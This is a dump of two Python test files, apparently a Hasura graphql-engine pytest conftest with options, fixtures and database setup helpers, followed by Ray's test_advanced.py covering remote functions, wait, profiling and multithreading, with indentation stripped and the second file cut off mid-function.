parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--test-webhook-request-context", action="store_true",
help="Run Test cases for testing webhook request context"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containing the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--test-function-permissions",
action="store_true",
required=False,
help="Run manual function permission tests"
)
parser.addoption(
"--test-jwk-url",
action="store_true",
default=False,
required=False,
help="Run testcases for JWK url behaviour"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
parser.addoption(
"--skip-schema-teardown",
action="store_true",
default=False,
required=False,
help="""
Skip tearing down the schema/Hasura metadata after tests. This option may result in test failures if the schema
has to change between the list of tests to be run
"""
)
parser.addoption(
"--skip-schema-setup",
action="store_true",
default=False,
required=False,
help="""
Skip setting up schema/Hasura metadata before tests.
This option may result in test failures if the schema has to change between the list of tests to be run
"""
)
parser.addoption(
"--avoid-error-message-checks",
action="store_true",
default=False,
required=False,
help="""
This option when set will ignore disparity in error messages between expected and response outputs.
Used basically in version upgrade/downgrade tests where the error messages may change
"""
)
parser.addoption(
"--collect-upgrade-tests-to-file",
metavar="<path>",
required=False,
help="When used along with collect-only, it will write the list of upgrade tests into the file specified"
)
parser.addoption(
"--test-unauthorized-role",
action="store_true",
help="Run testcases for unauthorized role",
)
parser.addoption(
"--enable-remote-schema-permissions",
action="store_true",
default=False,
help="Flag to indicate if the graphql-engine has enabled remote schema permissions",
)
parser.addoption(
"--redis-url",
metavar="REDIS_URL",
help="redis url for cache server",
default=False
)
parser.addoption(
"--backend",
help="run integration tests using a particular backend",
default="postgres"
)
parser.addoption(
"--pro-tests",
action="store_true",
default=False,
help="Flag to specify if the pro tests are to be run"
)
parser.addoption(
"--test-developer-api-enabled", action="store_true",
help="Run Test cases with the Developer API Enabled",
default=False
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
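# (i.e. a bare `pytest` run with pytest-xdist installed is rewritten to behave like
#  `pytest -n1 --dist=loadfile ...`, unless it is already running as an xdist worker)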
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
# Pytest has removed the global pytest.config
# As a solution we are going to store it in PytestConf.config
PytestConf.config = config
if is_help_option_present(config):
return
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl()
def pytest_report_collectionfinish(config, startdir, items):
"""
Collect server upgrade tests to the given file
"""
tests_file = config.getoption('--collect-upgrade-tests-to-file')
sep=''
tests=OrderedDict()
if tests_file:
def is_upgrade_test(item):
# Check if allow_server_upgrade_tests marker are present
# skip_server_upgrade_tests marker is not present
return item.get_closest_marker('allow_server_upgrade_test') \
and not item.get_closest_marker('skip_server_upgrade_test')
with open(tests_file,'w') as f:
upgrade_items = filter(is_upgrade_test, items)
for item in upgrade_items:
# This test should be run separately,
# since its schema setup has function scope
if 'per_method_tests_db_state' in item.fixturenames:
tests[item.nodeid] = True
elif any([ (x in item.fixturenames)
for x in
[ 'per_class_tests_db_state',
'per_class_db_schema_for_mutation_tests'
]
]):
# For this test, schema setup has class scope
# We can run a class of these tests at a time
tests[item.parent.nodeid] = True
# Assume tests can only be run separately
else:
tests[item.nodeid] = True
for test in tests.keys():
f.write(test + '\n')
return ''
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
if is_help_option_present(node.config):
return
# Pytest has removed the global pytest.config
node.slaveinput["hge-url"] = node.config.hge_url_list.pop()
node.slaveinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
if is_help_option_present(config):
return
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.slaveinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.slaveinput["pg-url"]
try:
hge_ctx = HGECtx(hge_url, pg_url, config)
except HGECtxError as e:
assert False, "Error from hge_ctx: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
# TODO why do we sleep here?
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='module')
def actions_fixture(hge_ctx):
if hge_ctx.is_default_backend:
pg_version = hge_ctx.pg_version
if pg_version < 100000: # version less than 10.0
pytest.skip('Actions are not supported on Postgres version < 10')
# Start actions' webhook server
webhook_httpd = ActionsWebhookServer(hge_ctx, server_address=('127.0.0.1', 5593))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
use_action_fixtures = pytest.mark.usefixtures(
"actions_fixture",
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests'
)
@pytest.fixture(scope='class')
def functions_permissions_fixtures(hge_ctx):
if not hge_ctx.function_permissions:
pytest.skip('These tests are meant to be run with --test-function-permissions set')
return
use_function_permission_fixtures = pytest.mark.usefixtures(
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests',
'functions_permissions_fixtures'
)
@pytest.fixture(scope='class')
def pro_tests_fixtures(hge_ctx):
if not hge_ctx.pro_tests:
pytest.skip('These tests are meant to be run with --pro-tests set')
return
@pytest.fixture(scope='class')
def scheduled_triggers_evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5594))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def gql_server(request, hge_ctx):
server = HGECtxGQLServer(request.config.getoption('--pg-urls'), 5991)
yield server
server.teardown()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
"""
This fixture provides an Apollo GraphQL websockets client
"""
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def ws_client_graphql_ws(request, hge_ctx):
"""
This fixture provides an GraphQL-WS client
"""
client = GraphQLWSClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def per_class_tests_db_state(request, hge_ctx):
"""
Set up the database state for select queries.
Has a class level scope, since select queries does not change database state
Expects either `dir()` method which provides the directory
with `setup.yaml` and `teardown.yaml` files
Or class variables `setup_files` and `teardown_files` that provides
the list of setup and teardown files respectively.
By default, for a postgres backend the setup and teardown is done via
the `/v1/query` endpoint, to setup using the `/v1/metadata` (metadata setup)
and `/v2/query` (DB setup), set the `setup_metadata_api_version` to "v2"
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='function')
def per_method_tests_db_state(request, hge_ctx):
"""
This fixture sets up the database state for metadata operations
Has a function level scope, since metadata operations may change both the schema and data
Class method/variable requirements are similar to that of per_class_tests_db_state fixture
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='class')
def per_class_db_schema_for_mutation_tests(request, hge_ctx):
"""
This fixture sets up the database schema for mutations.
It has a class level scope, since mutations does not change schema.
Expects either `dir()` class method which provides the directory with `schema_setup.yaml` and `schema_teardown.yaml` files,
or variables `schema_setup_files` and `schema_teardown_files`
that provides the list of setup and teardown files respectively
"""
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
db_context = db_context_with_schema_common(
request, hge_ctx, 'schema_setup_files', 'schema_setup.yaml', 'schema_teardown_files', 'schema_teardown.yaml', check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
@pytest.fixture(scope='function')
def per_method_db_data_for_mutation_tests(request, hge_ctx, per_class_db_schema_for_mutation_tests):
"""
This fixture sets up the data for mutations.
Has a function level scope, since mutations may change data.
Having just the setup file(s), or the teardown file(s) is allowed.
Expects either `dir()` class method which provides the directory with `values_setup.yaml` and / or `values_teardown.yaml` files.
The class may provide `values_setup_files` variables which contains the list of data setup files,
Or the `values_teardown_files` variable which provides the list of data teardown files.
"""
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(values_setup, values_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['values_setup', 'values_teardown']
]
yield from db_context_common(
request, hge_ctx, 'values_setup_files', values_setup,
'values_teardown_files', values_teardown,
False, False, False
)
@pytest.fixture(scope='function')
def backend():
"This fixture provides a default `backend` value for the `per_backend_tests` fixture"
return 'postgres'
@pytest.fixture(scope='function', autouse=True)
def per_backend_tests(hge_ctx, backend):
"""
This fixture ignores backend-specific tests unless the relevant --backend flag has been passed.
"""
# Currently, we default all tests to run on Postgres with or without a --backend flag.
# As our test suite develops, we may consider running backend-agnostic tests on all
# backends, unless a specific `--backend` flag is passed.
if not hge_ctx.backend == backend:
pytest.skip(
'Skipping test. Add --backend ' + backend + ' to run backend-specific tests'
)
return
def db_state_context(request, hge_ctx):
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
# setup the metadata and DB schema using the `/v1/query` endpoint
db_context = db_context_with_schema_common(
request, hge_ctx, 'setup_files', 'setup.yaml', 'teardown_files',
'teardown.yaml', check_file_exists )
elif setup_metadata_api_version == "v2":
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
def db_state_context_new(
request, hge_ctx, setup='setup.yaml', teardown='teardown.yaml',
schema_setup='schema_setup.yaml', schema_teardown='schema_teardown.yaml',
pre_setup='pre_setup.yaml', post_teardown='post_teardown.yaml'):
yield from db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, True
)
def db_context_with_schema_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_with_schema_common_new (
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, setup_sql_file, teardown_sql_file, pre_setup_file, post_teardown_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common_new (
request, hge_ctx, setup_files_attr, setup_default_file, setup_sql_file,
teardown_files_attr, teardown_default_file, teardown_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
if hge_ctx.is_default_backend:
yield from setup_and_teardown_v1q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
else:
yield from setup_and_teardown_v2q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
def db_context_common_new(
request, hge_ctx, setup_files_attr, setup_default_file,
setup_default_sql_file,
teardown_files_attr, teardown_default_file, teardown_default_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
setup_default_sql_file = os.path.join(request.cls.dir(), setup_default_sql_file)
teardown_default_sql_file = os.path.join(request.cls.dir(), teardown_default_sql_file)
pre_setup_default_file = os.path.join(request.cls.dir(), pre_setup_file)
post_teardown_default_file = os.path.join(request.cls.dir(), post_teardown_file)
yield from setup_and_teardown( request, hge_ctx, setup, teardown,
setup_default_sql_file, teardown_default_sql_file, pre_setup_default_file, post_teardown_default_file,
check_file_exists, skip_setup, skip_teardown)
def setup_and_teardown_v1q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v1q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v1q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v1q_f, teardown_files)
def setup_and_teardown_v2q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v2q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v2q_f, teardown_files)
def setup_and_teardown(request, hge_ctx, setup_files, teardown_files,
sql_schema_setup_file,sql_schema_teardown_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files, sql_schema_setup_file, sql_schema_teardown_file]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
if st_code != 200:
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v2/query', f, st_code, 200, resp)
def metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
if st_code != 200:
# drop the sql setup, if the metadata calls fail
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
def pre_post_metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
if not skip_setup:
run_on_elem_or_list(pre_post_metadataq_f, pre_setup_file)
run_on_elem_or_list(v2q_f, sql_schema_setup_file)
run_on_elem_or_list(metadataq_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(metadataq_f, teardown_files)
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
def run_on_elem_or_list(f, x):
if isinstance(x, str):
return [f(x)]
elif isinstance(x, list):
return [f(e) for e in x]
def is_help_option_present(config):
return any([
config.getoption(x)
for x in ['--fixtures','--help', '--collect-only']
])
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'slaveinput')
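# Illustrative only, not part of the suite: a test class that uses the class-scoped db
# state fixture typically points `dir()` at a directory containing setup.yaml and
# teardown.yaml (the directory path and the check_query_f helper below are assumptions
# based on how the accompanying test modules are usually written):
#
#     @pytest.mark.usefixtures('per_class_tests_db_state')
#     class TestSomeSelectQueries:
#
#         @classmethod
#         def dir(cls):
#             return 'queries/graphql_query/some_feature'
#
#         def test_select(self, hge_ctx):
#             check_query_f(hge_ctx, self.dir() + '/select_query.yaml')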
|
test_advanced.py
|
# coding: utf-8
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import random
import sys
import threading
import time
import numpy as np
import pytest
import ray
import ray.cluster_utils
import ray.test_utils
from ray.test_utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
# issue https://github.com/ray-project/ray/issues/7105
def test_internal_free(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
class Sampler:
def sample(self):
return [1, 2, 3, 4, 5]
def sample_big(self):
return np.zeros(1024 * 1024)
sampler = Sampler.remote()
# Free does not delete from in-memory store.
obj_id = sampler.sample.remote()
ray.get(obj_id)
ray.internal.free(obj_id)
assert ray.get(obj_id) == [1, 2, 3, 4, 5]
# Free deletes big objects from plasma store.
big_id = sampler.sample_big.remote()
ray.get(big_id)
ray.internal.free(big_id)
time.sleep(1) # wait for delete RPC to propagate
with pytest.raises(Exception):
ray.get(big_id)
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
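# A minimal sketch of the polling pattern used in test_profiling_api above.
# It is illustrative only: `_poll_until` is not part of Ray's API and is not
# called by these tests.
def _poll_until(condition, timeout_seconds=20, poll_interval=1.1):
    """Return True once condition() is truthy, False if the timeout elapses."""
    deadline = time.time() + timeout_seconds
    while time.time() < deadline:
        if condition():
            return True
        time.sleep(poll_interval)
    return False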
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
@pytest.mark.skip(reason="TODO(ekl)")
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
@ray.remote
class Echo:
def echo(self, value):
return value
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor:
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
